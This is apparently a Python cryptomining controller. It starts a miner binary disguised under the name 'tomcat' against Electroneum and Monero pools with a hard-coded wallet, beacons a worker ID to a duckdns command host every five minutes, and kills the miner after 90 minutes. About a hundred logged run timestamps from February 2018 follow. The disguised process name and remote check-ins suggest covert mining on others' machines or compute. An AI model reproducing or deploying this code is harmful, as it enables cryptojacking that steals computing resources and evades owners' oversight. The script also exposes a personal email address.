import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:53:03.970769
#2018-02-17 16:41:04.289989
#2018-02-17 18:28:05.207180
#2018-02-17 20:17:06.033128
#2018-02-17 22:04:06.103420
#2018-02-17 23:48:05.335512
#2018-02-18 01:37:01.688129
#2018-02-18 03:24:03.580246
#2018-02-18 05:11:07.178634
#2018-02-18 07:03:05.806252
#2018-02-18 08:51:04.025260
#2018-02-18 10:38:01.908212
#2018-02-18 12:23:04.765660
#2018-02-18 14:11:01.220249
#2018-02-18 16:01:06.970824
#2018-02-18 17:50:09.027097
#2018-02-18 19:38:04.788259
#2018-02-18 21:23:01.791021
#2018-02-18 23:11:07.663921
#2018-02-19 00:57:06.273624
#2018-02-19 02:44:04.819074
#2018-02-19 04:31:07.770240
#2018-02-19 06:16:04.374104
#2018-02-19 08:04:02.175206
#2018-02-19 09:54:07.529213
#2018-02-19 11:43:09.824912
#2018-02-19 13:30:09.851306
#2018-02-19 15:19:05.904929
#2018-02-19 17:07:01.396631
#2018-02-19 18:52:06.295844
#2018-02-19 20:41:08.164105
#2018-02-19 22:28:03.914898
#2018-02-20 00:14:03.782822
#2018-02-20 02:01:06.140569
#2018-02-20 03:51:05.775278
#2018-02-20 05:36:05.071390
#2018-02-20 07:21:05.470842
#2018-02-20 09:06:03.798337
#2018-02-20 10:49:06.263658
#2018-02-20 12:35:09.037756
#2018-02-20 14:20:10.376543
#2018-02-20 16:03:08.917500
#2018-02-20 17:49:07.308680
#2018-02-20 19:34:07.489087
#2018-02-20 21:20:09.690290
#2018-02-20 23:05:08.503883
#2018-02-21 00:49:01.861946
#2018-02-21 02:34:01.539739
#2018-02-21 04:22:03.759387
#2018-02-21 06:08:03.317781
#2018-02-21 07:54:06.879147
#2018-02-21 09:39:01.579082
#2018-02-21 11:27:05.742309
#2018-02-21 13:15:09.835731
#2018-02-21 15:02:06.364744
#2018-02-21 16:51:07.592105
#2018-02-21 18:40:10.511262
#2018-02-21 20:25:07.699861
#2018-02-21 22:13:01.584285
#2018-02-22 00:03:05.655056
#2018-02-22 01:51:06.339842
#2018-02-22 03:38:01.975525
#2018-02-22 05:24:08.261877
#2018-02-22 07:09:06.544785
#2018-02-22 08:55:06.992126
#2018-02-22 10:42:09.665479
#2018-02-22 12:30:12.980687
#2018-02-22 14:14:03.877333
#2018-02-22 16:02:04.474597
#2018-02-22 17:47:06.150690
#2018-02-22 19:33:09.988991
#2018-02-22 21:25:06.521694
#2018-02-22 23:11:03.509430
#2018-02-23 00:57:01.867039
#2018-02-23 02:44:05.677842
#2018-02-23 04:32:05.809953
#2018-02-23 06:18:04.258529
#2018-02-23 08:04:05.051837
#2018-02-23 10:20:08.228223
#2018-02-23 12:14:06.391580
#2018-02-23 14:03:06.267752
#2018-02-23 15:54:01.748776
#2018-02-23 17:39:07.749241
#2018-02-23 19:26:07.760619
#2018-02-23 21:10:07.060222
#2018-02-23 22:56:06.825502
#2018-02-24 00:43:01.386048
#2018-02-24 02:36:02.198519
#2018-02-24 04:29:06.700511
#2018-02-24 06:14:06.336533
#2018-02-24 08:02:04.628927
#2018-02-24 09:45:05.745238
#2018-02-24 11:39:07.632377
#2018-02-24 13:31:04.396925
#2018-02-24 15:18:03.922192
#2018-02-24 17:07:06.435445
#2018-02-24 18:58:06.905144
#2018-02-24 20:45:09.676764
#2018-02-24 23:01:03.656793
#2018-02-25 02:18:01.439061
#2018-02-25 05:42:05.084507
#2018-02-25 11:36:07.984333